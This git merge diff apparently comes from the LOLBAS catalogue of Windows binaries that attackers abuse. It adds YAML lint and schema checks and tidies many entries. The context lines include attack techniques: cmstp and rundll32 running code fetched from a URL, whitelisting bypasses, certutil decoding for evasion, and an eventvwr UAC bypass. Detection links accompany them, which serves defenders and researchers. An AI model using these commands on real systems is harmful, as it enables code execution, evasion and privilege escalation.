Merge branch 'master' into alias_introduction

2024-12-27 23:37:58 +01:00 · 2022-09-15 13:54:50 -04:00 · 2022-09-15 13:54:50 -04:00 · 3347e43b3f
commit 3347e43b3f
parent da469d0652 5e55bcb82e
170 changed files with 622 additions and 602 deletions
--- a/.github/.yamllint
+++ b/.github/.yamllint
@ -4,12 +4,12 @@ yaml-files:
  - '*.yml'
 rules:
  new-line-at-end-of-file:
-    level: warning
+    level: error
  trailing-spaces:
-    level: warning
+    level: error
  line-length:
    level: warning
  new-lines:
-    level: warning
+    level: error
  indentation:
-    level: warning
+    level: error
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@ -16,7 +16,7 @@ jobs:

      - name: Change .yml to .md
        run: |
-          for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
+          for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@ -1,19 +1,35 @@
 ---
-name: YAML Lint
-on:
-  push:
-    branches:
-      - master
-  pull_request:
-    branches:
-      - master
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
+on: [push,pull_request]

 jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v1
+      - uses: actions/checkout@v3
      - name: yaml-lint
        uses: ibiqlik/action-yamllint@v3
        with:
+          no_warnings: true
+          file_or_dir: yml/**/*.yml
          config_file: .github/.yamllint
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/.github/yaml-lint-reviewdog.yml.bak
+++ b/.github/yaml-lint-reviewdog.yml.bak
@ -0,0 +1,35 @@
+---
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
+
+jobs:
+  lintFiles:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: Run yamllint
+        uses: reviewdog/action-yamllint@v1
+        with:
+          level: error
+          reporter: github-pr-review # Change reporter.
+          yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Bart
    Handle: '@bartblaze'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@ -15,4 +15,3 @@ Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection:
  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---
--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@ -25,4 +25,3 @@ Acknowledgement:
    Handle: '@@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'
---
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -0,0 +1,118 @@
+---
+type: map
+mapping:
+# Id field enhancement possibility commenting out for now
+#  "Id":
+#    type: str
+#    required: true
+#    pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
+  "Name":
+    type: str
+    required: true
+  "Description":
+    type: str
+    required: true
+  "Aliases":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Alias":
+            type: str
+            required: false
+  "Author":
+    type: str
+    required: true
+  "Created":
+    type: date
+    required: true
+  "Commands":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Command":
+            type: str
+            required: true
+          "Description":
+            type: str
+            required: true
+          "Usecase":
+            type: str
+            required: true
+          "Category":
+            type: str
+            required: true
+            enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
+          "Privileges":
+            type: str
+            required: true
+          "MitreID":
+            type: str
+            required: true
+            pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
+          "OperatingSystem":
+            type: str
+            required: true
+  "Full_Path":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Path":
+            type: str
+            required: true
+  "Code_Sample":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Code":
+            type: str
+  "Detection":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "IOC":
+            type: str
+          "Sigma":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Analysis":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Elastic":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Splunk":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "BlockRule":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Resources":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Link":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Acknowledgement":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Person":
+            type: str
+          "Handle":
+            type: str
+            pattern: '^(@(\w){1,15})?$'
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -8,6 +8,8 @@ Created: YYYY-MM-DD (date the person created this file)
 Commands:
  - Command: The command
    Description: Description of the command
+    Aliases:
+      - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: cpl
    Handle: '@cpl3h'
---
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -23,7 +23,7 @@ Detection:
  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
  - Link: https://freddiebarrsmith.com/at.txt
-  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
+  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
  - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
 Acknowledgement:
  - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
-Code_Sample:
- Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -48,4 +48,3 @@ Acknowledgement:
    Handle: '@aionescu'
  - Person: Asif Matadar
    Handle: '@d1r4c'
---
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -46,7 +46,7 @@ Detection:
  - IOC: bitsadmin creates new files
  - IOC: bitsadmin adds data to alternate data stream
 Resources:
-  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
+  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
  - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@carnal0wnage'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Ensar Samil
    Handle: '@sblmsrsn'
---
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'
---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -39,7 +39,7 @@ Commands:
    Privileges: User
    MitreID: T1140
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: certutil --decodehex encoded_hexadecimal_InputFileName
+  - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
    Usecase: Decode files to evade defensive measures
    Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Lior Adar
---
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmd.exe
  - Path: C:\Windows\SysWOW64\cmd.exe
-Code_Sample:
- Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
---
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
-Code_Sample:
- Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
 Resources:
@ -24,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -14,15 +14,13 @@ Commands:
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
-    Category: AwL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
-Code_Sample:
-  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
---
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -29,4 +29,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -24,4 +24,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Wietze
    Handle: '@wietze'
---
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Gal Kristal
    Handle: '@gal_kristal'
---
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -7,7 +7,7 @@ Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,7 +17,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
 Resources:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@tim8288'
  - Person: Hai Vaknin
    Handle: '@vakninhai'
---
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
@ -32,4 +32,3 @@ Acknowledgement:
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'
---
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -50,7 +50,7 @@ Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
@ -66,5 +66,4 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Mike Cary
-    Handle: 'grayfold3d'
---
+    Handle: '@grayfold3d'
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -7,7 +7,7 @@ Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
-    Category: UAC bypass
+    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -29,7 +29,7 @@ Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -41,4 +41,3 @@ Acknowledgement:
    Handle: '@infosecn1nja'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@CyberRaiju'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -1,6 +1,6 @@
 ---
 Name: Extexport.exe
-Description:
+Description: Load a DLL located in the c:\test folder with a specific name.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -1,6 +1,6 @@
 ---
 Name: Extrac32.exe
-Description:
+Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -54,4 +54,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Tamir Yehuda
    Handle: '@tim8288'
---
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -1,6 +1,6 @@
 ---
 Name: Findstr.exe
-Description:
+Description: Write to ADS, discover, or download files with Findstr.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -36,7 +36,7 @@ Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
 Resources:
@ -45,4 +45,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@ -28,4 +28,3 @@ Acknowledgement:
    Handle: '@Ocelotty6669'
  - Person: Malwrologist
    Handle: '@DissectMalware'
---
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'
---
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
 Resources:
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@vector_sec'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
  - IOC: cmd /c as child process of ftp.exe
@ -37,5 +37,4 @@ Acknowledgement:
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
-    Handle: '@0xAmit '
---
+    Handle: '@0xAmit'
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -176,4 +176,3 @@ Resources:
 Acknowledgement:
  - Person: Jesus Galvez
    Handle:
---
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -1,6 +1,6 @@
 ---
 Name: Ie4uinit.exe
-Description:
+Description: Executes commands from a specially prepared ie4uinit.inf file.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -17,6 +17,7 @@ Commands:
    Category: Compile
    Privileges: User
    MitreID: T1127
+    OperatingSystem: Windows 10,7
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Lior Adar
    Handle:
---
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
 Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
+  - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Kyle Hanslovan
    Handle: '@kylehanslovan'
---
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -7,7 +7,7 @@ Commands:
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,7 +24,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
